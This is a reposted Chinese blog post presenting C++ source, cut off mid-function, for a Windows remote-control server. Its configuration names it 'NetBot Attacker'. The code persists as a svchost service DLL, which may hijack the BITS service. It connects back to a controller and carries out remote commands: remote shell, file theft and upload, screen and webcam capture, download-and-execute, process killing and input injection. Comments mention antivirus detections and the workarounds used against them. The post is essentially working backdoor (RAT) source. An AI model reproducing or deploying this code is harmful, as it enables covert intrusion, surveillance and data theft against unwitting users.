程序博客网 > java多进程同步

基于visual c++之windows核心编程代码分析(66)实现Windows服务的远程控制

来源:互联网 发布:java多进程同步 编辑:程序博客网 时间:2024/04/30 01:20

Windows服务之前已经进行了讲解,如何在安装Windows服务呢,作为远程控制的服务端。

安装Windows服务代码如下

#include "stdafx.h"//#include <windows.h>#include "InstallService.h"#include <winsvc.h>BOOL StartService(LPCTSTR lpService){SC_HANDLE        schSCManager;SC_HANDLE        schService;SERVICE_STATUS   ServiceStatus;DWORD            dwErrorCode;schSCManager=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);//打开服务控制管理器数据库if (schSCManager!=NULL){schService=::OpenService(schSCManager,lpService,SERVICE_ALL_ACCESS);//获得服务对象的句柄if (schService!=NULL){//设置服务为自动启动ChangeServiceConfig(schService, SERVICE_NO_CHANGE, SERVICE_AUTO_START, SERVICE_NO_CHANGE,NULL, NULL, NULL, NULL, NULL, NULL, NULL);if(StartService(schService,0,NULL)==0)//已经存在该服务,就启动服务                        {dwErrorCode=GetLastError();if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING){CloseServiceHandle(schSCManager);  CloseServiceHandle(schService);return true;}}while(QueryServiceStatus(schService,&ServiceStatus)!=0)           {if(ServiceStatus.dwCurrentState==SERVICE_START_PENDING){Sleep(100);}else{break;}}CloseServiceHandle(schService);}CloseServiceHandle(schSCManager);}elsereturn FALSE;return TRUE;}BOOL StopService(LPCTSTR lpService){SC_HANDLE        schSCManager;SC_HANDLE        schService;SERVICE_STATUS   RemoveServiceStatus;schSCManager=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);//打开服务控制管理器数据库if (schSCManager!=NULL){schService=::OpenService(schSCManager,lpService,SERVICE_ALL_ACCESS);//获得服务对象的句柄if (schService!=NULL){//设置服务为禁用ChangeServiceConfig(schService, SERVICE_NO_CHANGE, SERVICE_DISABLED, SERVICE_NO_CHANGE,NULL, NULL, NULL, NULL, NULL, NULL, NULL);if(QueryServiceStatus(schService,&RemoveServiceStatus)!=0){if(RemoveServiceStatus.dwCurrentState!=SERVICE_STOPPED)//停止服务{if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0){while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING)         {Sleep(10);QueryServiceStatus(schService,&RemoveServiceStatus);}}}}    CloseServiceHandle(schService);}::CloseServiceHandle(schSCManager);}else return FALSE;return TRUE;}BOOL ReplaceSvchostService(LPCTSTR lpService,LPCTSTR lpDllPath){int rc = 0;HKEY hKey = 0;BOOL bRet = FALSE;char szOpenKey[MAX_PATH];try{//暂停服务StopService(lpService);//修改dll指向ZeroMemory(szOpenKey,sizeof(szOpenKey));wsprintf(szOpenKey, "SYSTEM\\CurrentControlSet\\Services\\%s\\Parameters", lpService);        rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, szOpenKey, 0, KEY_ALL_ACCESS, &hKey);        if(ERROR_SUCCESS != rc) throw "";        rc = RegSetValueEx(hKey, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned char*)lpDllPath, strlen(lpDllPath)+1);        SetLastError(rc);if(ERROR_SUCCESS != rc) throw "RegSetValueEx(ServiceDll)";//运行服务bRet = StartService(lpService);}catch(char *str){if(str && str[0])        {            rc = GetLastError();        }}RegCloseKey(hKey);return bRet;}BOOL InstallSvchostService(LPCSTR strServiceName,        LPCSTR strDisplayName,        LPCSTR strDescription,       LPCSTR strDllPath){int rc = 0;HKEY hKey = 0;BOOL bRet = FALSE;char szOpenKey[MAX_PATH];try{      bRet = InstallService(strServiceName,                     strDisplayName, strDescription,                     "%SystemRoot%\\System32\\svchost.exe -k krnlsrvc"); //安装服务//修改dll指向ZeroMemory(szOpenKey,sizeof(szOpenKey));wsprintf(szOpenKey, "SYSTEM\\CurrentControlSet\\Services\\%s\\Parameters", strServiceName);        //rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, szOpenKey, 0, KEY_ALL_ACCESS, &hKey);rc = RegCreateKey(HKEY_LOCAL_MACHINE, szOpenKey,&hKey);         if(ERROR_SUCCESS != rc) throw "";        rc = RegSetValueEx(hKey, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned char*)strDllPath, strlen(strDllPath)+1);        SetLastError(rc);if(ERROR_SUCCESS != rc) throw "RegSetValueEx(ServiceDll)";RegCloseKey(hKey);//添加服务名到netsvcs组ZeroMemory(szOpenKey,sizeof(szOpenKey));strcpy(szOpenKey, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost");        rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, szOpenKey, 0, KEY_ALL_ACCESS, &hKey);        if(ERROR_SUCCESS != rc) throw "RegOpenKeyEx(Svchost)";rc = RegSetValueEx(hKey, "krnlsrvc", 0, REG_MULTI_SZ, (unsigned char*)strServiceName, strlen(strServiceName)+1);        SetLastError(rc);        if(ERROR_SUCCESS != rc) throw "RegSetValueEx(Svchost\\krnlsrvc)";RegCloseKey(hKey);bRet = StartService(strServiceName);}catch(char *str){if(str && str[0])        {            rc = GetLastError();        }}RegCloseKey(hKey);return bRet;}BOOL InstallService(LPCSTR strServiceName, LPCSTR strDisplayName, LPCSTR strDescription,LPCSTR strPathName){BOOL bRet = FALSE;HKEY key=NULL;SC_HANDLE svc=NULL, scm=NULL;__try{scm = OpenSCManager(0, 0,SC_MANAGER_ALL_ACCESS);if (!scm)__leave;svc = CreateService(scm, strServiceName, strDisplayName,SERVICE_ALL_ACCESS|SERVICE_INTERACTIVE_PROCESS,SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,SERVICE_ERROR_IGNORE,strPathName,NULL, NULL, NULL, NULL, NULL);if (svc == NULL){if (GetLastError() == ERROR_SERVICE_EXISTS){svc = OpenService(scm,strServiceName,SERVICE_ALL_ACCESS);if (svc==NULL)__leave;elseStartService(svc,0, 0);}}char Desc[MAX_PATH];wsprintf(Desc,"SYSTEM\\CurrentControlSet\\Services\\%s", strServiceName);RegOpenKey(HKEY_LOCAL_MACHINE,Desc,&key);RegSetValueEx(key,"Description",0,REG_SZ,(CONST BYTE*)strDescription,lstrlen(strDescription));if (!StartService(svc,0, 0))__leave;bRet = TRUE;}__finally{if (key!=NULL) RegCloseKey(key);if (svc!=NULL)CloseServiceHandle(svc);if (scm!=NULL)CloseServiceHandle(scm);}return bRet;}void UninstallService(LPCTSTR strServiceName){SC_HANDLE scm,svc;scm=::OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);if (scm!=NULL){svc=::OpenService(scm, strServiceName, SERVICE_ALL_ACCESS);if (svc!=NULL){::DeleteService(svc);::CloseServiceHandle(svc);}::CloseServiceHandle(scm);}}

如何实现远程控制的一些列功能呢,键盘,鼠标远程协助,文件上传下载,视频截获,桌面视频截获等等。

请见代码与注释

 


 

#include "stdafx.h"#include "svchost.h"#include <shlwapi.h>#include "../Seu_lib/Functions.h"#include "InstallService.h"#include "../Seu_lib/zconf.h"#include "../Seu_lib/zlib.h"#pragma comment(lib,"../Seu_lib/zlib.lib")//图象无损数据压缩使用zlib库函数#pragma comment(lib,"shlwapi.lib")#pragma comment(linker,"/IGNORE:4078")#pragma comment(linker,"/OPT:NOWIN98")//#define NETBOT_TEST/////////////////////////////////////////////////////////////////////////////////////////////struct MODIFY_DATA {char  strIPFile[128];   //ip文件or DNSchar  strVersion[16];   //服务端版本DWORD dwVipID;          //VIP IDBOOL  bReplace;         //TRUE-替换服务,FALSE-新建服务char  strSvrName[32];   //服务名称char  strSvrDisp[100];  //服务显示char  strSvrDesc[100];  //服务描述char  ServerAddr[100];int   ServerPort; }modify_data = {"192.168.1.132:9000","080625",62,FALSE,"NetBot","NetBot Attacker","NetBot Attacker"," ",8080,};HMODULE     g_hDllModule;unsigned long resolve(char *host){ long i; struct hostent *he; if((i=inet_addr(host))<0)   if((he=(struct hostent*)gethostbyname(host))==NULL)//if((he=(struct hostent*)Ggethostbyname(host))==NULL)     return(0);   else     return(*(unsigned long *)he->h_addr); return(i);}void GetIpAndPort(){char html[256];//获取的网页char *point;//指针char port[12];memset(html,0,sizeof(html));    if(strstr(modify_data.strIPFile,"http") == NULL)//不含HTTP,表示是IP/DNS上线{strcpy(html,"[");strcat(html,modify_data.strIPFile);strcat(html,"]");}else{    //获取网页内容    for(;;){lstrcpy(html,strlwr(GetHttpFile(modify_data.strIPFile)));if(strstr(html,"[")!=NULL)break;    else    Sleep(10000);}}//MessageBox(NULL,html,NULL,MB_OK);//分离客户端ip和端口point=html;if(strstr(html,"[")!=NULL){point=point+strlen("[");}if(strstr(point,":")!=NULL){    memset(modify_data.ServerAddr,0,sizeof(modify_data.ServerAddr));strncpy(modify_data.ServerAddr,point,strcspn(point,":"));point=point+strcspn(point,":")+1;if(strstr(point,"]")!=NULL){    memset(port,0,sizeof(port));    strncpy(port,point,strcspn(point,"]"));modify_data.ServerPort = atoi(port);}}}DWORD _stdcall RuningThread(LPVOID lParam){WSADATA lpWSAData;WSAStartup(MAKEWORD(2, 2), &lpWSAData);while(1){GetIpAndPort();HANDLE hThread = NULL;hThread = CreateThread(NULL,NULL,ConnectThread,NULL,NULL,NULL);WaitForSingleObject(hThread, INFINITE);CloseHandle(hThread);Sleep(10000);}WSACleanup();return 0;}DWORD _stdcall ConnectThread(LPVOID lParam){struct sockaddr_in LocalAddr;LocalAddr.sin_family=AF_INET;LocalAddr.sin_port=htons(modify_data.ServerPort);LocalAddr.sin_addr.S_un.S_addr=resolve(modify_data.ServerAddr);//连接的socketSOCKET MainSocket = socket(AF_INET, SOCK_STREAM, 0);if(connect(MainSocket,(PSOCKADDR)&LocalAddr,sizeof(LocalAddr)) == SOCKET_ERROR)return 0;//connect errorelseTurnonKeepAlive(MainSocket, 75);SysInfo m_SysInfo;GetSystemInfo(m_SysInfo);//获取系统信息m_SysInfo.iVipID = modify_data.dwVipID;m_SysInfo.bVideo = CVideoCap::IsWebCam();lstrcpy(m_SysInfo.cVersion, modify_data.strVersion);EncryptData((unsigned char *)&m_SysInfo, sizeof(SysInfo), modify_data.dwVipID);//用产品ID号加密//send socket typeMsgHead msgHead;char    chBuffer[4096];msgHead.dwCmd  = SOCKET_CONNECT;//填充消息msgHead.dwSize = sizeof(SysInfo); memcpy(chBuffer,&m_SysInfo, sizeof(SysInfo));//填充被控端信息if( !SendMsg(MainSocket, (char *)&m_SysInfo, &msgHead) ){closesocket(MainSocket);return 1;//send socket type error}while(1){//接收命令if(! RecvMsg(MainSocket, (char *)chBuffer, &msgHead)){//掉线,错误shutdown(MainSocket,0x02);closesocket(MainSocket);break;}//解析命令switch(msgHead.dwCmd){case CMD_FILEMANAGE:{CreateThread(NULL,NULL,FileManageThread,NULL,NULL,NULL);//开一个文件管理的线程}break;/*case CMD_SCREENSTART:{//获取上线的socket==DWORDDWORD dwSock = msgHead.dwExtend1;CreateThread(NULL,NULL,ScreenThread,(LPVOID)dwSock,NULL,NULL);      //开一个屏幕传输的线程}break;case CMD_PROCESSSTART:{CreateThread(NULL,NULL,ProcessThread,NULL,NULL,NULL);    //开一个进程管理的线程}break;case CMD_SHELLSTART:{CreateThread(NULL,NULL,ShellThread,NULL,NULL,NULL);        //开一个远程Shell的线程}break;case CMD_VIDEOSTART:{CreateThread(NULL,NULL,VideoThread,NULL,NULL,NULL);        //开一个视频捕捉的线程}break;case CMD_HEARTBEAT://心跳包{//不处理这里,可以做计数,因为控制端基本也是定时发的}break;case CMD_UNINSTALL://卸载{shutdown(MainSocket,0x02);closesocket(MainSocket);lstrcpy(modify_data.strIPFile,"");char szDllPath[MAX_PATH],szCmdLine[MAX_PATH];    GetModuleFileName(g_hDllModule,szDllPath,MAX_PATH);MoveFileEx(szDllPath,NULL,MOVEFILE_DELAY_UNTIL_REBOOT);wsprintf(szCmdLine, "Rundll32 %s,RundllUninstall", szDllPath);WinExec(szCmdLine, SW_HIDE);}break;case CMD_POWEROFF://关机{SetPrivilege(SE_SHUTDOWN_NAME,TRUE);ExitWindowsEx(EWX_POWEROFF | EWX_FORCE, 0);}break;case CMD_REBOOT://重启{SetPrivilege(SE_SHUTDOWN_NAME,TRUE);ExitWindowsEx(EWX_REBOOT | EWX_FORCE, 0);}break;case CMD_LOGOFF://注销{SetPrivilege(SE_SHUTDOWN_NAME,TRUE);ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);}break;case CMD_DOWNEXEC://下载执行{char strUrl[256];memset(strUrl, 0, 256);lstrcpyn(strUrl, chBuffer,msgHead.dwSize);DownExec(strUrl);}break;case CMD_OPENURL://打开网页{char strUrl[256];memset(strUrl, 0, 256);lstrcpyn(strUrl, chBuffer,msgHead.dwSize);OpenUrl(strUrl);}break;case CMD_CTRLALTDEL:// Ctrl + Alt + del{}break;case CMD_KEYDOWN://WM_KEYDOWN {XScreenXor OpenDesktop;int nVirtKey = msgHead.dwExtend1;keybd_event((BYTE)nVirtKey,0,0,0);}break;case CMD_KEYUP://WM_KEYUP{XScreenXor OpenDesktop;int nVirtKey = msgHead.dwExtend1;keybd_event((BYTE)nVirtKey,0,KEYEVENTF_KEYUP,0);}break;case CMD_MOUSEMOVE://WM_MOUSEMOVE{XScreenXor OpenDesktop;POINT pt;pt.x = msgHead.dwExtend1;pt.y = msgHead.dwExtend2;SetCursorPos(pt.x, pt.y);}break;case CMD_LBUTTONDOWN://WM_LBUTTONDOWN{XScreenXor OpenDesktop;mouse_event(MOUSEEVENTF_LEFTDOWN,0,0,0,0);}break;case CMD_LBUTTONUP://WM_LBUTTONUP{XScreenXor OpenDesktop;mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,0);}break;case CMD_LBUTTONDBLCLK://WM_LBUTTONDBLCLK{XScreenXor OpenDesktop;mouse_event(MOUSEEVENTF_LEFTDOWN,0,0,0,0);mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,0);mouse_event(MOUSEEVENTF_LEFTDOWN,0,0,0,0);mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,0);}break;case CMD_RBUTTONDOWN://WM_RBUTTONDOWN  {XScreenXor OpenDesktop;mouse_event(MOUSEEVENTF_RIGHTDOWN,0,0,0,0);}break;case CMD_RBUTTONUP://WM_RBUTTONUP{XScreenXor OpenDesktop;mouse_event(MOUSEEVENTF_RIGHTUP,0,0,0,0);}break;case CMD_RBUTTONDBLCLK://WM_RBUTTONDBLCLK{XScreenXor OpenDesktop;mouse_event(MOUSEEVENTF_RIGHTDOWN,0,0,0,0);mouse_event(MOUSEEVENTF_RIGHTUP,0,0,0,0);mouse_event(MOUSEEVENTF_RIGHTDOWN,0,0,0,0);mouse_event(MOUSEEVENTF_RIGHTUP,0,0,0,0);}break;*/default:    break;}}return 10;}////////////////////////////////////////////////////////////////////////////////////文件管理线程DWORD _stdcall FileManageThread(LPVOID lParam){struct sockaddr_in LocalAddr;LocalAddr.sin_family=AF_INET;LocalAddr.sin_port=htons(modify_data.ServerPort);LocalAddr.sin_addr.S_un.S_addr=resolve(modify_data.ServerAddr);SOCKET FileSocket = socket(AF_INET, SOCK_STREAM, 0);if(connect(FileSocket,(PSOCKADDR)&LocalAddr,sizeof(LocalAddr)) == SOCKET_ERROR){closesocket(FileSocket);return 0;//connect error}//================================================================================MsgHead msgHead;char *chBuffer = new char[1536 * 1024]; //数据交换区 1.5MB//send socket type msgHead.dwCmd = SOCKET_FILEMANAGE;msgHead.dwSize = 0;if(!SendMsg(FileSocket, chBuffer, &msgHead)){if(chBuffer != NULL)delete []chBuffer;closesocket(FileSocket);return 0;//send socket type error}while(1){//接收命令if(!RecvMsg(FileSocket, chBuffer, &msgHead))break;//解析命令switch(msgHead.dwCmd){case CMD_FILEDRIVER://获取驱动器{FileListDirver(chBuffer, &msgHead);}break;case CMD_FILEDIRECTORY://获取文件夹{FileListDirectory(chBuffer, &msgHead);}break;case CMD_FILEDELETE://删除{FileDelete(chBuffer, &msgHead);}break;case CMD_FILEEXEC://执行{FileExec(chBuffer, &msgHead);}break;case CMD_FILEPASTE://粘贴{FilePaste(chBuffer, &msgHead);}break;case CMD_FILERENAME://重命名{FileReName(chBuffer, &msgHead);}break;case CMD_FILEDOWNSTART://下载开始{FileOpt m_FileOpt;memcpy(&m_FileOpt,chBuffer,sizeof(m_FileOpt));if(CreateThread(NULL,NULL,FileDownThread,(LPVOID)&m_FileOpt,NULL,NULL) != NULL)msgHead.dwCmd  = CMD_SUCCEED;elsemsgHead.dwCmd  = CMD_FAILED;msgHead.dwSize = 0;}break;/*case CMD_FILEUPSTART://上传开始{FileOpt m_FileOpt;memcpy(&m_FileOpt,chBuffer,sizeof(m_FileOpt));if(CreateThread(NULL,NULL,FileUpThread,(LPVOID)&m_FileOpt,NULL,NULL) != NULL)msgHead.dwCmd  = CMD_SUCCEED;elsemsgHead.dwCmd  = CMD_FAILED;msgHead.dwSize = 0;}break;*/default:{msgHead.dwCmd = CMD_INVALID;msgHead.dwSize = 0;}    break;}//发送数据if(!SendMsg(FileSocket, chBuffer, &msgHead))break;}if(chBuffer != NULL)delete[] chBuffer;closesocket(FileSocket);return 0;}///////////////////////////////////////////////////////////////////////////////////DWORD _stdcall ScreenThread(LPVOID lParam){DWORD dwSock = (DWORD)lParam;struct sockaddr_in LocalAddr;LocalAddr.sin_family=AF_INET;LocalAddr.sin_port=htons(modify_data.ServerPort);LocalAddr.sin_addr.S_un.S_addr=resolve(modify_data.ServerAddr);//屏幕监控的socketSOCKET ScreenSocket = socket(AF_INET, SOCK_STREAM, 0);if(connect(ScreenSocket,(PSOCKADDR)&LocalAddr,sizeof(LocalAddr)) == SOCKET_ERROR){return 0;//connect error}else{//设置发送缓冲区,有利于屏幕传输int rcvbuf = 65536; //64KBint rcvbufsize=sizeof(int); setsockopt(ScreenSocket,SOL_SOCKET,SO_SNDBUF,(char*)&rcvbuf,rcvbufsize); }  //稍微降低进程优先级SetThreadPriority( GetCurrentThread(), THREAD_PRIORITY_BELOW_NORMAL );//=======================================================MsgHead msgHead;int nColor = 8;//send socket type msgHead.dwCmd = SOCKET_SCREEN;msgHead.dwSize = 0;msgHead.dwExtend1 = dwSock;if(!SendMsg(ScreenSocket, NULL, &msgHead) ||   !RecvMsg(ScreenSocket, NULL, &msgHead) )//Get Screen Color{closesocket(ScreenSocket);return 0;//send socket type error}else{nColor = msgHead.dwExtend1;}////////////////////////////////////////XScreenXor m_ScreenXor;m_ScreenXor.SetColor(nColor);//设置位图颜色m_ScreenXor.InitGlobalVar();msgHead.dwCmd = SOCKET_SCREEN;msgHead.dwSize = 0;msgHead.dwExtend1 = m_ScreenXor.GetBmpSize();msgHead.dwExtend2 = m_ScreenXor.GetInfoSize();//发送位图信息if (!SendMsg(ScreenSocket, NULL, &msgHead)){closesocket(ScreenSocket);return 0;//send socket type error}DWORD dwFrameID = 0, dwLastSend;BOOL  bNotStop = TRUE;DWORD lenthUncompress = m_ScreenXor.GetBmpSize();DWORD lenthCompress = (lenthUncompress+12)*1.1;BYTE* pDataCompress = new BYTE [lenthCompress];while( bNotStop ){dwLastSend = GetTickCount();lenthCompress = (lenthUncompress+12)*1.1;                                   //这里不能少m_ScreenXor.CaputreFrame(dwFrameID);                                        //抓取当前帧                           Sleep(10);::compress(pDataCompress,                                                  //压缩数据&lenthCompress, m_ScreenXor.GetBmpData(),lenthUncompress);msgHead.dwCmd     = dwFrameID++;              //当前帧号msgHead.dwSize    = lenthCompress;            //传输的数据长度msgHead.dwExtend1 = m_ScreenXor.GetBmpSize(); //原始长度msgHead.dwExtend2 = lenthCompress;            //压缩后长度bNotStop = SendMsg(ScreenSocket, (char*)pDataCompress, &msgHead); //发送数据if ((GetTickCount() - dwLastSend) < 110)Sleep(100);}//释放掉掉分配的内存,句柄等等closesocket(ScreenSocket);delete [] pDataCompress;return 0;}////////////////////////////////////////////////////////////////////////////////////视频捕捉DWORD _stdcall VideoThread(LPVOID lParam){struct sockaddr_in LocalAddr;LocalAddr.sin_family=AF_INET;LocalAddr.sin_port=htons(modify_data.ServerPort);LocalAddr.sin_addr.S_un.S_addr=resolve(modify_data.ServerAddr);//视频捕捉的socketSOCKET VideoSocket = socket(AF_INET, SOCK_STREAM, 0);if(connect(VideoSocket,(PSOCKADDR)&LocalAddr,sizeof(LocalAddr)) == SOCKET_ERROR){return 0;//connect error}else{//设置发送缓冲区,有利于视频传输int rcvbuf = 65536; //64KBint rcvbufsize=sizeof(int); setsockopt(VideoSocket,SOL_SOCKET,SO_SNDBUF,(char*)&rcvbuf,rcvbufsize); }  //==================================================================MsgHead msgHead;//send socket type msgHead.dwCmd = SOCKET_VIDEOCAP;msgHead.dwSize = 0;if(!SendMsg(VideoSocket, NULL, &msgHead)){closesocket(VideoSocket);return 0;//send socket type error}/////////////////////////////////////////////////Send BITMAPINFO or error codeif (!CVideoCap::IsWebCam())    //设备不存在或正在使用{msgHead.dwCmd = 1;msgHead.dwSize = 0;SendMsg(VideoSocket, NULL, &msgHead);shutdown(VideoSocket,0x02);closesocket(VideoSocket);return 1;//send socket type error}CVideoCap m_Cap;if (!m_Cap.Initialize())   //设备初始化失败{msgHead.dwCmd = 2;msgHead.dwSize = 0;SendMsg(VideoSocket, NULL, &msgHead);shutdown(VideoSocket,0x02);closesocket(VideoSocket);return 2;}msgHead.dwCmd  = 0;msgHead.dwSize = sizeof(BITMAPINFOHEADER);if(!SendMsg(VideoSocket, (char*)&(m_Cap.m_lpbmi->bmiHeader), &msgHead)){closesocket(VideoSocket);return 3;//send socket type error}DWORD dwFrameID = 0,dwLastSend;BOOL  bNotStop = TRUE;DWORD lenthUncompress = m_Cap.m_lpbmi->bmiHeader.biSizeImage - 5;//为啥-5??DWORD lenthCompress = (lenthUncompress+12)*1.1;BYTE* pDataCompress = new BYTE [lenthCompress];while (bNotStop){dwLastSend = GetTickCount();//被卡巴杀lenthCompress = (lenthUncompress+12)*1.1;                   //这个不能少::compress(pDataCompress,                                   //压缩数据&lenthCompress, (BYTE*)m_Cap.GetDIB(),lenthUncompress);msgHead.dwCmd     = dwFrameID++;            //帧号msgHead.dwSize    = lenthCompress;          //传输的数据长度msgHead.dwExtend1 = lenthUncompress;        //未压缩数据长度msgHead.dwExtend2 = lenthCompress;          //压缩后数据长度bNotStop = SendMsg(VideoSocket, (char*)pDataCompress, &msgHead); //发送数据if ((GetTickCount() - dwLastSend) < 100)Sleep(80);}if (pDataCompress != NULL)delete[] pDataCompress;return 10;}///////////////////////////////////////////////////////////////////////////////////进程管理线程DWORD _stdcall ProcessThread(LPVOID lParam){struct sockaddr_in LocalAddr;LocalAddr.sin_family=AF_INET;LocalAddr.sin_port=htons(modify_data.ServerPort);LocalAddr.sin_addr.S_un.S_addr=resolve(modify_data.ServerAddr);SOCKET ProcessSocket = socket(AF_INET, SOCK_STREAM, 0);if(connect(ProcessSocket,(PSOCKADDR)&LocalAddr,sizeof(LocalAddr)) == SOCKET_ERROR){closesocket(ProcessSocket);return 0;//connect error}//================================================================================MsgHead msgHead;char    chBuffer[32 * 1024]; //数据交换区//send socket type msgHead.dwCmd = SOCKET_PROCESS;msgHead.dwSize = 0;if(!SendMsg(ProcessSocket, chBuffer, &msgHead)){closesocket(ProcessSocket);return 0;//send socket type error}while(1){//接收命令if(!RecvMsg(ProcessSocket, chBuffer, &msgHead))break;//解析命令switch(msgHead.dwCmd){case CMD_PROCESSLIST:{ProcessList(chBuffer, &msgHead);}break;case CMD_PROCESSKILL:{ProcessKill(chBuffer, &msgHead);}break;default:{msgHead.dwCmd = CMD_INVALID;msgHead.dwSize = 0;}    break;}//发送数据if(!SendMsg(ProcessSocket, chBuffer, &msgHead))break;}closesocket(ProcessSocket);return 0;}////////////////////////////////////////////////////////////////////////////////////远程shell线程DWORD _stdcall ShellThread(LPVOID lParam){struct sockaddr_in LocalAddr;LocalAddr.sin_family=AF_INET;LocalAddr.sin_port=htons(modify_data.ServerPort);LocalAddr.sin_addr.S_un.S_addr=resolve(modify_data.ServerAddr);SOCKET ShellSocket = socket(AF_INET, SOCK_STREAM, 0);if(connect(ShellSocket,(PSOCKADDR)&LocalAddr,sizeof(LocalAddr)) == SOCKET_ERROR){closesocket(ShellSocket);return 0;//connect error}//====================================================================MsgHead msgHead;char *chBuffer = new char[512 * 1024]; //数据交换区 512KB//send socket type msgHead.dwCmd = SOCKET_CMDSHELL;msgHead.dwSize = 0;if(!SendMsg(ShellSocket, chBuffer, &msgHead)){closesocket(ShellSocket);return 0;//send socket type error}while(1){//接收命令if(!RecvMsg(ShellSocket, chBuffer, &msgHead))break;//解析命令switch(msgHead.dwCmd){case CMD_SHELLRUN:{DOSShell(chBuffer, &msgHead);}break;default:    break;}//发送数据if(!SendMsg(ShellSocket, chBuffer, &msgHead))break;}if(chBuffer != NULL)delete[] chBuffer;closesocket(ShellSocket);return 0;}////////////////////////////////////////////////////////////////////////////////////文件上传下载DWORD _stdcall FileDownThread(LPVOID lParam){FileOpt m_FileOpt;memcpy(&m_FileOpt,(FileOpt*)lParam,sizeof(FileOpt));struct sockaddr_in LocalAddr;LocalAddr.sin_family=AF_INET;LocalAddr.sin_port=htons(modify_data.ServerPort);LocalAddr.sin_addr.S_un.S_addr=resolve(modify_data.ServerAddr);SOCKET FileSocket = socket(AF_INET, SOCK_STREAM, 0);if(connect(FileSocket,(PSOCKADDR)&LocalAddr,sizeof(LocalAddr)) == SOCKET_ERROR){closesocket(FileSocket);return 0;//connect error}MsgHead msgHead;//send socket type msgHead.dwCmd = SOCKET_FILEDOWN;msgHead.dwSize = 0;if(!SendMsg(FileSocket, NULL, &msgHead)){closesocket(FileSocket);return 0;//send socket type error}//////////////////////////////////////////////////////HANDLE hDownFile = INVALID_HANDLE_VALUE;DWORD  dwDownFileSize = 0, dwBytes;BYTE   SendBuffer[4096];int nRet =0 ;//get download datahDownFile = CreateFile(m_FileOpt.cScrFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);if (hDownFile == INVALID_HANDLE_VALUE)//CMD_READFILEEORdwDownFileSize  = 0;elsedwDownFileSize = GetFileSize(hDownFile, NULL);m_FileOpt.iSize = dwDownFileSize;//send file messageif(send(FileSocket, (char *)&m_FileOpt, sizeof(FileOpt), 0) <=0 || dwDownFileSize <= 0){shutdown(FileSocket,0x02);closesocket(FileSocket);return 1;//send socket type error}//被NOD32启发杀了//HINSTANCE hInst;HINSTANCE hInst = LoadLibrary("kernel32.dll");if(hInst == NULL){closesocket(FileSocket);return 0;//send socket type error}typedef BOOL (WINAPI *pReadFile)(HANDLE hFile,LPVOID lpBuffer,DWORD nNumberOfBytesToRead,LPDWORD lpNumberOfBytesRead,LPOVERLAPPED lpOverlapped);pReadFile MyReadFile;//pReadFile MyReadFile = (pReadFile)GetProcAddress(hInst, "ReadFile");//循环发送文件数据while(dwDownFileSize > 0){if (MyReadFile){if( !MyReadFile(hDownFile, SendBuffer, 4096, &dwBytes, NULL) )break;}else{if( !ReadFile(hDownFile, SendBuffer, 4096, &dwBytes, NULL) )break;}if( send(FileSocket, (char*)&SendBuffer, dwBytes, 0) <= 0 )break;dwDownFileSize -= dwBytes;}if (hInst)FreeLibrary(hInst);CloseHandle(hDownFile);shutdown(FileSocket,0x02);closesocket(FileSocket);return 10;}DWORD _stdcall FileUpThread(LPVOID lParam){FileOpt m_FileOpt;memcpy(&m_FileOpt,(FileOpt*)lParam,sizeof(FileOpt));struct sockaddr_in LocalAddr;LocalAddr.sin_family=AF_INET;LocalAddr.sin_port=htons(modify_data.ServerPort);LocalAddr.sin_addr.S_un.S_addr=resolve(modify_data.ServerAddr);SOCKET FileSocket = socket(AF_INET, SOCK_STREAM, 0);if(connect(FileSocket,(PSOCKADDR)&LocalAddr,sizeof(LocalAddr)) == SOCKET_ERROR){closesocket(FileSocket);return 0;//connect error}int iOutTime = 60000;//60秒超时setsockopt(FileSocket, SOL_SOCKET, SO_RCVTIMEO, (char*)&iOutTime, sizeof(int));MsgHead msgHead;//send socket type msgHead.dwCmd = SOCKET_FILEUP;msgHead.dwSize = 0;if(!SendMsg(FileSocket, NULL, &msgHead)){closesocket(FileSocket);return 0;//send socket type error}//////////////////////////////////////////////////////HANDLE hUpFile = INVALID_HANDLE_VALUE;DWORD  dwUpFileSize = 0, dwBufSize = 4096, dwBytes;BYTE   RecvBuffer[4096];int nRet =0 ;//get download datahUpFile = CreateFile(m_FileOpt.cScrFile, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);if (hUpFile == INVALID_HANDLE_VALUE)//CMD_READFILEEORdwUpFileSize  = 0;elsedwUpFileSize = 100;m_FileOpt.iSize = dwUpFileSize;//send file messageif(send(FileSocket, (char *)&m_FileOpt, sizeof(FileOpt), 0) <=0 || dwUpFileSize <= 0){shutdown(FileSocket,0x02);closesocket(FileSocket);return 1;//send socket type error}while(TRUE){nRet = recv(FileSocket, (char*)&RecvBuffer, dwBufSize, 0);if (nRet <= 0)break;WriteFile(hUpFile, RecvBuffer, nRet, &dwBytes, NULL);}CloseHandle(hUpFile);shutdown(FileSocket,0x02);closesocket(FileSocket);return 10;}////////////////////////////////////////////////////////////////////////////////////////////////////BOOL _stdcall Install(LPCSTR szDllPath){if (modify_data.bReplace)return ReplaceSvchostService("BITS",szDllPath);elsereturn InstallSvchostService(modify_data.strSvrName,                              modify_data.strSvrDisp,                  modify_data.strSvrDesc,                 szDllPath);}BOOL _stdcall Uninstall(){if (modify_data.bReplace){StopService(modify_data.strSvrName);}else{StopService(modify_data.strSvrName);UninstallService(modify_data.strSvrName);}return TRUE;}void CALLBACK RundllInstall(HWND hwnd, HINSTANCE hinst, char *param, int nCmdShow){Install(param);}void CALLBACK 